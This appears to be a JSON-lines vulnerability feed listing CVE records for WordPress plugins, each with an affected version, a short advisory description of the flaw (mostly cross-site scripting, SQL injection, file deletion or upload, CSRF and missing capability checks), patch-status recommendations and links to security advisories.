{"CVE_ID":"CVE-2025-5337","slug":"ml-slider","versionImpact":"3.98.0","description":"The Slider, Gallery, and Carousel by MetaSlider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018aria-label\u2019 parameter in all versions up to, and including, 3.98.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ml-slider\\\/tags\\\/3.98.0\\\/assets\\\/metaslider\\\/script.js#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ml-slider\\\/tags\\\/3.98.0\\\/assets\\\/metaslider\\\/script.js#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309932\\\/ml-slider\\\/tags\\\/3.99.0\\\/assets\\\/metaslider\\\/script.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309932\\\/ml-slider\\\/tags\\\/3.99.0\\\/assets\\\/metaslider\\\/script.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ml-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ml-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e6492e5-a506-4d77-96d2-08f700b6ee76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e6492e5-a506-4d77-96d2-08f700b6ee76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7643","slug":"attachment-manager","versionImpact":"2.1.2","description":"The Attachment Manager plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the handle_actions() function in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attachment-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attachment-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5731b971-4408-4c64-809c-e95fba33009e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5731b971-4408-4c64-809c-e95fba33009e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45820","slug":"learnpress","versionImpact":"4.1.7.3.2","description":"SQL Injection (SQLi) vulnerability in LearnPress \u2013 WordPress LMS Plugin <= 4.1.7.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-auth-sql-injection-sqli-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-auth-sql-injection-sqli-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0065","slug":"i2-pro-cons","versionImpact":"1.3.1","description":"The i2 Pros & Cons WordPress plugin through 1.3.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42c3ac68-4bbc-4d47-ad53-2c9ed48cd677\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42c3ac68-4bbc-4d47-ad53-2c9ed48cd677\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46074","slug":"freshmail-integration","versionImpact":"2.3.2","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Borbis Media FreshMail For WordPress plugin <=\u00a02.3.2 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4460","slug":"uploading-svgwebp-and-ico-files","versionImpact":"1.2.1","description":"The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f8d425-449a-471f-94df-8439924fd628\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f8d425-449a-471f-94df-8439924fd628\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6499","slug":"lastunes","versionImpact":"3.6.1","description":"The lasTunes WordPress plugin through 3.6.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69592e52-92db-4e30-92ca-b7b3d5b9185d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69592e52-92db-4e30-92ca-b7b3d5b9185d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5347","slug":"happy-elementor-addons","versionImpact":"3.10.9","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'arrow' attribute within the plugin's Post Navigation widget in all versions up to, and including, 3.10.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415a7201-bdff-4342-9e06-ce0e500cdc7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415a7201-bdff-4342-9e06-ce0e500cdc7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.9\\\/widgets\\\/post-navigation\\\/widget.php#L588\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.9\\\/widgets\\\/post-navigation\\\/widget.php#L588\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/post-navigation\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/post-navigation\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6317","slug":"generate-pdf-using-contact-form-7","versionImpact":"4.0.6","description":"The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and the plugin not properly validating a file or its path prior to deleting it in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455b9695-e140-4bdb-b626-5c1695518563?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455b9695-e140-4bdb-b626-5c1695518563?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L74\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5808","slug":"wp-ajax-contact-form","versionImpact":"2.2.2","description":"The WP Ajax Contact Form WordPress plugin through 2.2.2 does not have CSRF check in place when deleting emails from the email list, which could allow attackers to make a logged in admin perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1783bbce-3cc3-4a7e-a491-b713cee8278b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1783bbce-3cc3-4a7e-a491-b713cee8278b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11457","slug":"feedpress-generator","versionImpact":"1.2.1","description":"The Feedpress Generator \u2013 External RSS Frontend Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedpress-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/feedpress-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9660aee-1069-4197-b166-12ea30f8fd0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9660aee-1069-4197-b166-12ea30f8fd0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9619","slug":"wp-shapes","versionImpact":"1.0.0","description":"The WP SHAPES plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-shapes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-shapes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8207ae15-b6ae-4b58-8877-1f87c12dbe7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8207ae15-b6ae-4b58-8877-1f87c12dbe7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9673","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.31","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Heading widget in all versions up to, and including, 2.4.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/extension-pafe-tooltip.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/extension-pafe-tooltip.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217875\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217875\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/317a0e93-fcd7-41a0-a83e-98c50bfc6be2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/317a0e93-fcd7-41a0-a83e-98c50bfc6be2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13628","slug":"wp-pricing-table","versionImpact":"1.1","description":"The WP Pricing Table WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d6c8a2-e70d-485c-a217-4a569c16b079\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d6c8a2-e70d-485c-a217-4a569c16b079\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2164","slug":"pixelstats","versionImpact":"0.8.2","description":"The pixelstats plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post_id' and 'sortby' parameters in all versions up to, and including, 0.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L664\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelstats\\\/tags\\\/0.8.2\\\/pixelstats.php#L664\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixelstats\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixelstats\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8683bc00-1136-42c4-a256-84b2cac1d575?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8683bc00-1136-42c4-a256-84b2cac1d575?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32238","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5.2","description":"Generation of Error Message Containing Sensitive Information vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita allows Retrieve Embedded Sensitive Data. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.5.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-2-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-2-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5238","slug":"yith-woocommerce-wishlist","versionImpact":"4.5.0","description":"The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/docs.yithemes.com\\\/yith-woocommerce-wishlist\\\/changelog\\\/changelog-free-version\\\/\",\"name\":\"https:\\\/\\\/docs.yithemes.com\\\/yith-woocommerce-wishlist\\\/changelog\\\/changelog-free-version\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yith-woocommerce-wishlist\\\/tags\\\/4.5.0\\\/assets\\\/js\\\/unminified\\\/jquery.yith-wcwl.js\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/yith-woocommerce-wishlist\\\/tags\\\/4.5.0\\\/assets\\\/js\\\/unminified\\\/jquery.yith-wcwl.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310555\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310555\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yith-woocommerce-wishlist\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yith-woocommerce-wishlist\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4b0434-61ca-47b1-9119-7208283f916f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4b0434-61ca-47b1-9119-7208283f916f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6726","slug":"block-editor-gallery-slider","versionImpact":"1.1.1","description":"The Block Editor Gallery Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the classic_gallery_slider_options() function in all versions up to, and including, 1.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited post meta for arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/block-editor-gallery-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/block-editor-gallery-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/770b0401-4d05-476e-a2b1-e9e9c920f5fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/770b0401-4d05-476e-a2b1-e9e9c920f5fa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45808","slug":"learnpress","versionImpact":"4.1.7.3.2","description":"SQL Injection vulnerability in LearnPress \u2013 WordPress LMS Plugin <= 4.1.7.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0064","slug":"wens-responsive-column-layout-shortcodes","versionImpact":"2.3","description":"The eVision Responsive Column Layout Shortcodes WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97be5795-b5b8-40c7-80bf-7da95da7705a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97be5795-b5b8-40c7-80bf-7da95da7705a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1021","slug":"amr-ical-events-list","versionImpact":"6.6","description":"The amr ical events lists WordPress plugin through 6.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91d04f96-11b2-46dc-860c-dc6c26360bf3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91d04f96-11b2-46dc-860c-dc6c26360bf3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4551","slug":"yotuwp-easy-youtube-embed","versionImpact":"1.3.13","description":"The Video Gallery \u2013 YouTube Playlist, Channel Gallery by YotuWP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.13 via the display function. This makes it possible for authenticated attackers, with contributor access and higher, to include and execute arbitrary php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c932-5955-4fce-a64d-3b5c5de95356?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c932-5955-4fce-a64d-3b5c5de95356?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/inc\\\/views.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/inc\\\/views.php#L828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/File%20Inclusion\\\/#lfi-to-rce-via-php-pearcmd\",\"name\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/File%20Inclusion\\\/#lfi-to-rce-via-php-pearcmd\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6316","slug":"generate-pdf-using-contact-form-7","versionImpact":"4.0.6","description":"The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and missing file type validation in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52cce49b-49b3-49b0-9f18-4829f07a420f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52cce49b-49b3-49b0-9f18-4829f07a420f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L72\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5807","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not prevent high privilege users like administrators from uploading malicious PHP files, which could allow them to run arbitrary code on servers hosting their site, even in MultiSite configurations.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/badb16b5-8c06-4170-b605-ea7af8982c1f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/badb16b5-8c06-4170-b605-ea7af8982c1f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11380","slug":"wp-mini-program","versionImpact":"1.4.5","description":"The Mini Program API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'qvideo' shortcode in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mini-program\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-mini-program\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0b9499b-3017-46a6-80d5-104d203b77f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0b9499b-3017-46a6-80d5-104d203b77f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12296","slug":"apus-framework","versionImpact":"2.3","description":"The Apus Framework plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'import_page_options' function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dda2c437-8f41-480a-8816-2c07ab0eafa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dda2c437-8f41-480a-8816-2c07ab0eafa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
